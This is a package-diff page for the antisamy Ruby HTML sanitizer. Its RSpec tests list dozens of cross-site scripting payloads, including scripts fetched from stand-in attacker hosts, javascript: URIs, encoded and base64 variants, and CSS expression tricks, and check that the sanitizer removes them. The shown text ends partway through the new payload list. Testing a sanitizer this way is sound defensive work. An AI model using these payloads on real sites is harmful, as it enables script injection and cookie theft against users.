RubyGems - antisamy - Versions diffs - 0.2.1 → 0.3.0 - Mend

antisamy 0.2.1 → 0.3.0

Files changed (51) hide show

data/CHANGELOG.rdoc +13 -0
data/LICENSE.txt +20 -20
data/README.rdoc +41 -41
data/lib/antisamy.rb +46 -46
data/lib/antisamy/css/css_filter.rb +187 -187
data/lib/antisamy/css/css_scanner.rb +84 -84
data/lib/antisamy/css/css_validator.rb +128 -128
data/lib/antisamy/csspool/rsac.rb +1 -1
data/lib/antisamy/csspool/rsac/sac.rb +14 -14
data/lib/antisamy/csspool/rsac/sac/conditions.rb +5 -5
data/lib/antisamy/csspool/rsac/sac/conditions/attribute_condition.rb +50 -50
data/lib/antisamy/csspool/rsac/sac/conditions/begin_hyphen_condition.rb +18 -18
data/lib/antisamy/csspool/rsac/sac/conditions/class_condition.rb +18 -18
data/lib/antisamy/csspool/rsac/sac/conditions/combinator_condition.rb +36 -36
data/lib/antisamy/csspool/rsac/sac/conditions/condition.rb +29 -29
data/lib/antisamy/csspool/rsac/sac/conditions/id_condition.rb +23 -23
data/lib/antisamy/csspool/rsac/sac/conditions/one_of_condition.rb +18 -18
data/lib/antisamy/csspool/rsac/sac/conditions/pseudo_class_condition.rb +20 -20
data/lib/antisamy/csspool/rsac/sac/document_handler.rb +66 -66
data/lib/antisamy/csspool/rsac/sac/error_handler.rb +13 -13
data/lib/antisamy/csspool/rsac/sac/generated_parser.rb +1012 -1012
data/lib/antisamy/csspool/rsac/sac/generated_property_parser.rb +9284 -9284
data/lib/antisamy/csspool/rsac/sac/lexeme.rb +27 -27
data/lib/antisamy/csspool/rsac/sac/lexical_unit.rb +201 -201
data/lib/antisamy/csspool/rsac/sac/parse_exception.rb +4 -4
data/lib/antisamy/csspool/rsac/sac/parser.rb +109 -109
data/lib/antisamy/csspool/rsac/sac/property_parser.rb +44 -44
data/lib/antisamy/csspool/rsac/sac/selectors.rb +5 -5
data/lib/antisamy/csspool/rsac/sac/selectors/child_selector.rb +36 -36
data/lib/antisamy/csspool/rsac/sac/selectors/conditional_selector.rb +45 -45
data/lib/antisamy/csspool/rsac/sac/selectors/descendant_selector.rb +36 -36
data/lib/antisamy/csspool/rsac/sac/selectors/element_selector.rb +35 -35
data/lib/antisamy/csspool/rsac/sac/selectors/selector.rb +25 -25
data/lib/antisamy/csspool/rsac/sac/selectors/sibling_selector.rb +35 -35
data/lib/antisamy/csspool/rsac/sac/selectors/simple_selector.rb +21 -21
data/lib/antisamy/csspool/rsac/sac/token.rb +25 -25
data/lib/antisamy/csspool/rsac/sac/tokenizer.rb +185 -185
data/lib/antisamy/csspool/rsac/stylesheet.rb +3 -3
data/lib/antisamy/csspool/rsac/stylesheet/rule.rb +20 -20
data/lib/antisamy/csspool/rsac/stylesheet/stylesheet.rb +76 -76
data/lib/antisamy/html/handler.rb +112 -99
data/lib/antisamy/html/sax_filter.rb +305 -302
data/lib/antisamy/html/scanner.rb +47 -43
data/lib/antisamy/model/attribute.rb +19 -19
data/lib/antisamy/model/css_property.rb +39 -39
data/lib/antisamy/model/tag.rb +31 -31
data/lib/antisamy/policy.rb +577 -545
data/lib/antisamy/scan_results.rb +89 -89
data/spec/antisamy_spec.rb +208 -142
data/spec/spec_helper.rb +12 -12
metadata +79 -81

data/lib/antisamy/scan_results.rb CHANGED Viewed

@@ -1,89 +1,89 @@
-module AntiSamy
-  class ScanError < StandardError; end
-  # Scan message, it will contain a message key, tag and optionally content, value
-  class ScanMessage
-    # error.tag.notfound
-    ERROR_TAG_NOT_IN_POLICY = "error.tag.notfound"
-    # error.tag.removed
-    ERROR_TAG_DISALLOWED = "error.tag.removed"
-    # error.tag.filtered
-    ERROR_TAG_FILTERED = "error.tag.filtered"
-    # error.tag.encoded
-    ERROR_TAG_ENCODED = "error.tag.encoded"
-    # error.css.tag.malformed
-    ERROR_CSS_TAG_MALFORMED = "error.css.tag.malformed"
-    # error.css.attribute.malformed
-    ERROR_CSS_ATTRIBUTE_MALFORMED = "error.css.attribute.malformed"
-    # error.attribute.invalid.filtered
-    ERROR_ATTRIBUTE_CAUSE_FILTER = "error.attribute.invalid.filtered"
-    # error.attribute.invalid.encoded
-    ERROR_ATTRIBUTE_CAUSE_ENCODE = "error.attribute.invalid.encoded"
-    # error.attribute.invalid.filtered
-    ERROR_ATTRIBUTE_INVALID_FILTERED = "error.attribute.invalid.filtered"
-    # error.attribute.invalid.removed
-    ERROR_ATTRIBUTE_INVALID_REMOVED = "error.attribute.invalid.removed"
-    # error.attribute.notfound
-    ERROR_ATTRIBUTE_NOT_IN_POLICY = "error.attribute.notfound"
-    # error.attribute.invalid
-    ERROR_ATTRIBUTE_INVALID = "error.attribute.invalid"
-    # comment removed
-    ERROR_COMMENT_REMOVED = "error.comment.removed"
-    # tag rule not found
-    ERROR_CSS_TAG_RULE_NOTFOUND = "error.css.tag.notfound"
-    # style sheet nto found
-    ERROR_STYLESHEET_RULE_NOTFOUND = "error.stylesheet.notfound"
-    # embedded stylesheets disabled
-    ERROR_CSS_IMPORT_DISABLED = "error.css.import.disabled"
-    # bad uri
-    ERROR_CSS_IMPORT_URL_INVALID = "error.css.import.uri.invalid"
-    # disallowed selector
-    ERROR_CSS_TAG_SELECTOR_DISALLOWED = "error.css.tag.removed"
-    # invalid for style sheet
-    ERROR_STYLESHEET_SELECTOR_DISALLOWED = "error.style.tag.notallowed"
-    # invlaid css tag property
-    ERROR_CSS_TAG_PROPERTY_INVALID = "error.css.property.invalid"
-    # invid style sheet roperty tag
-    ERROR_STYLESHEET_PROPERTY_INVALID = "error.stylesheet.css.property.invalid"
-    # exceed alloted imports
-    ERROR_CSS_IMPORT_EXCEEDED = "error.import.exceeded.sheets"
-    # exceede size
-    ERROR_CSS_IMPORT_INPUT_SIZE = "error.import.exceeded.size"
-    # Failed to import
-    ERROR_CSS_IMPORT_FAILURE = "error.import.bad.uri"
-    # selector not found
-    ERROR_STYLESHEET_SELECTOR_NOTFOUND = "error.css.stylesheet.selector.notfound"
-    # selector in css not fond
-    ERROR_CSS_TAG_SELECTOR_NOTFOUND = "error.css.tag.selector.notfound"
-    attr_reader :tag, :content, :value, :msgkey
-    def initialize(msgkey, tag, content=nil,value=nil)
-      @msgkey = msgkey
-      @tag = tag
-      @content = content
-      @value = value
-    end
-    def to_s
-      "#{self.msgkey} #{@tag} #{@content} #{@value}"
-    end
-  end
-  # Container of scan results, provides a list of ScanMessage indicating
-  # why elements were removed from the resulting html
-  class ScanResults
-    attr_reader :scan_start, :scan_end
-    attr_accessor :messages, :clean_html
-    def initialize(scan_start,scan_end = nil)
-      @errors = []
-      @scan_start = scan_start
-      @scan_end = scan_end
-      @clean_html = ''
-    end
-    # Get the calculated scan time
-    def scan_time
-      @scan_end ||= Time.now
-      (@scan_end - @scan_start).round(2)
-    end
-  end
-end
+module AntiSamy
+  class ScanError < StandardError; end
+  # Scan message, it will contain a message key, tag and optionally content, value
+  class ScanMessage
+    # error.tag.notfound
+    ERROR_TAG_NOT_IN_POLICY = "error.tag.notfound"
+    # error.tag.removed
+    ERROR_TAG_DISALLOWED = "error.tag.removed"
+    # error.tag.filtered
+    ERROR_TAG_FILTERED = "error.tag.filtered"
+    # error.tag.encoded
+    ERROR_TAG_ENCODED = "error.tag.encoded"
+    # error.css.tag.malformed
+    ERROR_CSS_TAG_MALFORMED = "error.css.tag.malformed"
+    # error.css.attribute.malformed
+    ERROR_CSS_ATTRIBUTE_MALFORMED = "error.css.attribute.malformed"
+    # error.attribute.invalid.filtered
+    ERROR_ATTRIBUTE_CAUSE_FILTER = "error.attribute.invalid.filtered"
+    # error.attribute.invalid.encoded
+    ERROR_ATTRIBUTE_CAUSE_ENCODE = "error.attribute.invalid.encoded"
+    # error.attribute.invalid.filtered
+    ERROR_ATTRIBUTE_INVALID_FILTERED = "error.attribute.invalid.filtered"
+    # error.attribute.invalid.removed
+    ERROR_ATTRIBUTE_INVALID_REMOVED = "error.attribute.invalid.removed"
+    # error.attribute.notfound
+    ERROR_ATTRIBUTE_NOT_IN_POLICY = "error.attribute.notfound"
+    # error.attribute.invalid
+    ERROR_ATTRIBUTE_INVALID = "error.attribute.invalid"
+    # comment removed
+    ERROR_COMMENT_REMOVED = "error.comment.removed"
+    # tag rule not found
+    ERROR_CSS_TAG_RULE_NOTFOUND = "error.css.tag.notfound"
+    # style sheet nto found
+    ERROR_STYLESHEET_RULE_NOTFOUND = "error.stylesheet.notfound"
+    # embedded stylesheets disabled
+    ERROR_CSS_IMPORT_DISABLED = "error.css.import.disabled"
+    # bad uri
+    ERROR_CSS_IMPORT_URL_INVALID = "error.css.import.uri.invalid"
+    # disallowed selector
+    ERROR_CSS_TAG_SELECTOR_DISALLOWED = "error.css.tag.removed"
+    # invalid for style sheet
+    ERROR_STYLESHEET_SELECTOR_DISALLOWED = "error.style.tag.notallowed"
+    # invlaid css tag property
+    ERROR_CSS_TAG_PROPERTY_INVALID = "error.css.property.invalid"
+    # invid style sheet roperty tag
+    ERROR_STYLESHEET_PROPERTY_INVALID = "error.stylesheet.css.property.invalid"
+    # exceed alloted imports
+    ERROR_CSS_IMPORT_EXCEEDED = "error.import.exceeded.sheets"
+    # exceede size
+    ERROR_CSS_IMPORT_INPUT_SIZE = "error.import.exceeded.size"
+    # Failed to import
+    ERROR_CSS_IMPORT_FAILURE = "error.import.bad.uri"
+    # selector not found
+    ERROR_STYLESHEET_SELECTOR_NOTFOUND = "error.css.stylesheet.selector.notfound"
+    # selector in css not fond
+    ERROR_CSS_TAG_SELECTOR_NOTFOUND = "error.css.tag.selector.notfound"
+    attr_reader :tag, :content, :value, :msgkey
+    def initialize(msgkey, tag, content=nil,value=nil)
+      @msgkey = msgkey
+      @tag = tag
+      @content = content
+      @value = value
+    end
+    def to_s
+      "#{self.msgkey} #{@tag} #{@content} #{@value}"
+    end
+  end
+  # Container of scan results, provides a list of ScanMessage indicating
+  # why elements were removed from the resulting html
+  class ScanResults
+    attr_reader :scan_start, :scan_end
+    attr_accessor :messages, :clean_html
+    def initialize(scan_start,scan_end = nil)
+      @errors = []
+      @scan_start = scan_start
+      @scan_end = scan_end
+      @clean_html = ''
+    end
+    # Get the calculated scan time
+    def scan_time
+      @scan_end ||= Time.now
+      (@scan_end - @scan_start).round(2)
+    end
+  end
+end

data/spec/antisamy_spec.rb CHANGED Viewed

@@ -1,142 +1,208 @@
-require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
-module AntiSamy
-  describe AntiSamy do
-    let(:policy_file) {"#{File.join(File.dirname(__FILE__), '..', 'policy-examples')}/antisamy-testing.xml"}
-    let(:strict_policy) {"#{File.join(File.dirname(__FILE__), '..', 'policy-examples')}/antisamy-anythinggoes.xml"}
-    let(:policy_object) {AntiSamy.policy(policy_file)}
-    it "should load a policy" do
-      p = AntiSamy.policy(policy_file)
-      p.should_not == nil
-    end
-    it "should scan our sample html and change nothing" do
-      input = "<p>Hi</p>"
-      p = AntiSamy.policy(policy_file)
-      r = AntiSamy.scan(input,p)
-      r.clean_html.should == input
-    end
-    it "should tak our input and remove the script tags" do
-      input = "<p style='font-size: 16px'>Hi</p><script> some junk</script>"
-      expec = "<p>Hi</p>"
-      p = AntiSamy.policy(policy_file)
-      r = AntiSamy.scan(input,p)
-      r.clean_html.should == expec
-      r.messages.size.should == 2 # error 1 for script tag, error 2 for style tag
-    end
-    # Script attacks
-    {
-      "test<script>alert(document.cookie)</script>" => "script",
-      "<<<><<script src=http://fake-evil.ru/test.js>" => "<script",
-      "<script<script src=http://fake-evil.ru/test.js>>" => "<script",
-      "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "<script",
-      '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>' => "onload",
-      "<BODY ONLOAD=alert('XSS')>" => "alert",
-      "<iframe src=http://ha.ckers.org/scriptlet.html <" => "<iframe",
-      "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">" => "src"
-    }.each_pair do |k,v|
-      it "should remove #{v} from #{k} for script attacks" do
-        r = AntiSamy.scan(k,policy_object)
-        r.clean_html.should_not include(v)
-      end
-    end
-    #Image Attacks
-    {
-      "<img src='http://www.myspace.com/img.gif'>"=>"<img",
-      "<img src=javascript:alert(document.cookie)>"=>"<img",
-      "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>"=>"<img",
-      "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>" => "&amp;",
-      "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>"=>"&amp;",
-      "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">" => "alert",
-      "<IMG SRC=\"javascript:alert('XSS')\"" => "javascript",
-      "<IMG LOWSRC=\"javascript:alert('XSS')\">"=>"javascript",
-      "<BGSOUND SRC=\"javascript:alert('XSS');\">"=>"javascript",
-    }.each_pair do |k,v|
-      it "should remove #{v} from #{k} for image attacks" do
-        r = AntiSamy.scan(k,policy_object)
-        r.clean_html.should_not include(v)
-      end
-    end
-    # Css attacks
-    {
-      "<div style=\"position:absolute\">" => "position",
-      "<style>b { position:absolute }</style>" => "position",
-      "<div style=\"z-index:25\">" => "z-index",
-      "<style>z-index:25</style>" => "z-index",
-      "<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">" => "font-family"
-    }.each_pair do |k,v|
-      it "should remove #{v} from #{k} for CSS attacks" do
-        r = AntiSamy.scan(k,policy_object)
-        r.clean_html.should_not include(v)
-      end
-    end
-    #href attacks
-    {
-      "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">" => "href",
-      "<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">" => "href",
-      "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>" => "ha.ckers",
-      "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>" => "ha.ckers",
-      "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>" => "xss",
-      "<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS" => "javascript",
-      "<IMG SRC='vbscript:msgbox(\"XSS\")'>" => "vbscript",
-      "<a . href=\"http://www.test.com\">" => " . ",
-      "<a - href=\"http://www.test.com\">" => "-",
-      "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">" => "meta",
-      "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">" => "meta",
-      "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">" => "meta",
-      "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>" => "iframe",
-      "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>" => "javascript",
-      "<TABLE BACKGROUND=\"javascript:alert('XSS')\">" => "background",
-      "<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">" => "background",
-      "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">" => "javascript",
-      "<DIV STYLE=\"width: expression(alert('XSS'));\">" => "alert",
-      "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">" => "alert",
-      "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>" => "alert",
-      "<BASE HREF=\"javascript:alert('XSS');//\">" => "javascript",
-      "<BaSe hReF=\"http://arbitrary.com/\">" => "base",
-      "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>" => "object",
-      "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>" => "object",
-      "<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>" => "embed",
-      "<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>" => "embed",
-      "<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
-      "<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
-      "<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
-      "<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
-      "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
-      "<SCRIPT SRC=http://ha.ckers.org/xss.js" => "script",
-      "<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>" => "style",
-      "<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>" => "calc.exe",
-      "<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->" => "javascript",
-      "<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">" => "<a style=",
-      "<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>" => "blur",
-      "<b><i>Some Text</b></i>" => "<i />",
-      "<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">" => "font-family",
-      "<style type=\"text/css\"><![CDATA[P {  margin-bottom: 0.08in; } ]]></style>" => "margin"
-    }.each_pair do |k,v|
-      it "should remove #{v} from #{k} for href attacks" do
-        r = AntiSamy.scan(k,policy_object)
-        r.clean_html.should_not include(v)
-      end
-    end
-    it "shoud import some stylesheets" do
-      input = "<style>@import url(http://www.owasp.org/skins/monobook/main.css);@import url(http://www.w3schools.com/stdtheme.css);@import url(http://www.google.com/ig/f/t1wcX5O39cc/ig.css); </style>"
-      r = AntiSamy.scan(input,policy_object)
-      r.clean_html.should_not be_empty
-    end
-    it "should not touch this url" do
-      input = "<a href=\"http://www.aspectsecurity.com\">Aspect Security</a>"
-      r = AntiSamy.scan(input,policy_object)
-      r.clean_html.should == input
-    end
-  end
-end
+require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
+module AntiSamy
+  describe AntiSamy do
+    let(:policy_file) {"#{File.join(File.dirname(__FILE__), '..', 'policy-examples')}/antisamy-testing.xml"}
+    let(:strict_policy) {"#{File.join(File.dirname(__FILE__), '..', 'policy-examples')}/antisamy-anythinggoes.xml"}
+    let(:policy_object) {AntiSamy.policy(policy_file)}
+    it "should load a policy" do
+      p = AntiSamy.policy(policy_file)
+      p.should_not == nil
+    end
+	it "should handle a missing head tag in a full document" do
+		input =<<-HTML
+		<html>
+		<body>some text</body>
+		</html>
+		HTML
+		p = AntiSamy.policy(policy_file)
+		r = AntiSamy.scan(input,p)
+		r.clean_html.gsub(/\n/,'').should == input.gsub(/\t|\n/,'')
+	end
+	it "should handle a document and keep the html tag" do
+		input =<<-HTML
+		<html>
+		<head><title>sup</title></head>
+		<body>some text</body>
+		</html>
+		HTML
+		p = AntiSamy.policy(policy_file)
+		r = AntiSamy.scan(input,p)
+		r.clean_html.gsub(/\n/,'').should == input.gsub(/\t|\n/,'')
+	end
+	it "should allow empty tags" do
+		input =<<-HTML
+		<html>
+		<head><title>sup</title></head>
+		<body>some text<br><div></div></body>
+		</html>
+		HTML
+		p = AntiSamy.policy(policy_file)
+		r = AntiSamy.scan(input,p)
+		r.clean_html.gsub(/\n/,'').should == input.gsub(/\t|\n/,'')
+	end
+	it "shoulw remove an empty tag as per the poilicy" do
+		input =<<-HTML
+		<html>
+		<head><title>sup</title></head>
+		<body>some text<br><h2/></body>
+		</html>
+		HTML
+		expect =<<-HTML
+		<html>
+		<head><title>sup</title></head>
+		<body>some text<br></body>
+		</html>
+		HTML
+		p = AntiSamy.policy(policy_file)
+		r = AntiSamy.scan(input,p)
+		r.clean_html.gsub(/\n/,'').should == expect.gsub(/\t|\n/,'')
+	end
+    it "should wrap plain text" do
+      input = "Hi"
+      p = AntiSamy.policy(policy_file)
+      r = AntiSamy.scan(input,p)
+      r.clean_html.should == "<p>#{input}</p>"
+    end
+    it "should scan our sample html and change nothing" do
+      input = "<p>Hi</p>"
+      p = AntiSamy.policy(policy_file)
+      r = AntiSamy.scan(input,p)
+      r.clean_html.should == input
+    end
+    it "should tak our input and remove the script tags" do
+      input = "<p style='font-size: 16px'>Hi</p><script> some junk</script>"
+      expec = "<p>Hi</p>"
+      p = AntiSamy.policy(policy_file)
+      r = AntiSamy.scan(input,p)
+      r.clean_html.should == expec
+      r.messages.size.should == 2 # error 1 for script tag, error 2 for style tag
+    end
+    # Script attacks
+    {
+      "test<script>alert(document.cookie)</script>" => "script",
+      "<<<><<script src=http://fake-evil.ru/test.js>" => "<script",
+      "<script<script src=http://fake-evil.ru/test.js>>" => "<script",
+      "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "<script",
+      '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>' => "onload",
+      "<BODY ONLOAD=alert('XSS')>" => "alert",
+      "<iframe src=http://ha.ckers.org/scriptlet.html <" => "<iframe",
+      "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">" => "src"
+    }.each_pair do |k,v|
+      it "should remove #{v} from #{k} for script attacks" do
+        r = AntiSamy.scan(k,policy_object)
+        r.clean_html.should_not include(v)
+      end
+    end
+    #Image Attacks
+    {
+      "<img src='http://www.myspace.com/img.gif'>"=>"<img",
+      "<img src=javascript:alert(document.cookie)>"=>"<img",
+      "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>"=>"<img",
+      "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>" => "&amp;",
+      "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>"=>"&amp;",
+      "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">" => "alert",
+      "<IMG SRC=\"javascript:alert('XSS')\"" => "javascript",
+      "<IMG LOWSRC=\"javascript:alert('XSS')\">"=>"javascript",
+      "<BGSOUND SRC=\"javascript:alert('XSS');\">"=>"javascript",
+    }.each_pair do |k,v|
+      it "should remove #{v} from #{k} for image attacks" do
+        r = AntiSamy.scan(k,policy_object)
+        r.clean_html.should_not include(v)
+      end
+    end
+    # Css attacks
+    {
+      "<div style=\"position:absolute\">" => "position",
+      "<style>b { position:absolute }</style>" => "position",
+      "<div style=\"z-index:25\">" => "z-index",
+      "<style>z-index:25</style>" => "z-index",
+      "<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">" => "font-family"
+    }.each_pair do |k,v|
+      it "should remove #{v} from #{k} for CSS attacks" do
+        r = AntiSamy.scan(k,policy_object)
+        r.clean_html.should_not include(v)
+      end
+    end
+    #href attacks
+    {
+      "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">" => "href",
+      "<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">" => "href",
+      "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>" => "ha.ckers",
+      "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>" => "ha.ckers",
+      "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>" => "xss",
+      "<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS" => "javascript",
+      "<IMG SRC='vbscript:msgbox(\"XSS\")'>" => "vbscript",
+      "<a . href=\"http://www.test.com\">" => " . ",
+      "<a - href=\"http://www.test.com\">" => "-",
+      "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">" => "meta",
+      "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">" => "meta",
+      "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">" => "meta",
+      "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>" => "iframe",
+      "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>" => "javascript",
+      "<TABLE BACKGROUND=\"javascript:alert('XSS')\">" => "background",
+      "<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">" => "background",
+      "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">" => "javascript",
+      "<DIV STYLE=\"width: expression(alert('XSS'));\">" => "alert",
+      "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">" => "alert",
+      "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>" => "alert",
+      "<BASE HREF=\"javascript:alert('XSS');//\">" => "javascript",
+      "<BaSe hReF=\"http://arbitrary.com/\">" => "base",
+      "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>" => "object",
+      "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>" => "object",
+      "<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>" => "embed",
+      "<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>" => "embed",
+      "<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
+      "<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
+      "<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
+      "<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
+      "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
+      "<SCRIPT SRC=http://ha.ckers.org/xss.js" => "script",
+      "<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>" => "style",
+      "<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>" => "calc.exe",
+      "<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->" => "javascript",
+      "<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">" => "<a style=",
+      "<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>" => "blur",
+      "<b><i>Some Text</b></i>" => "<i />",
+      "<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">" => "font-family",
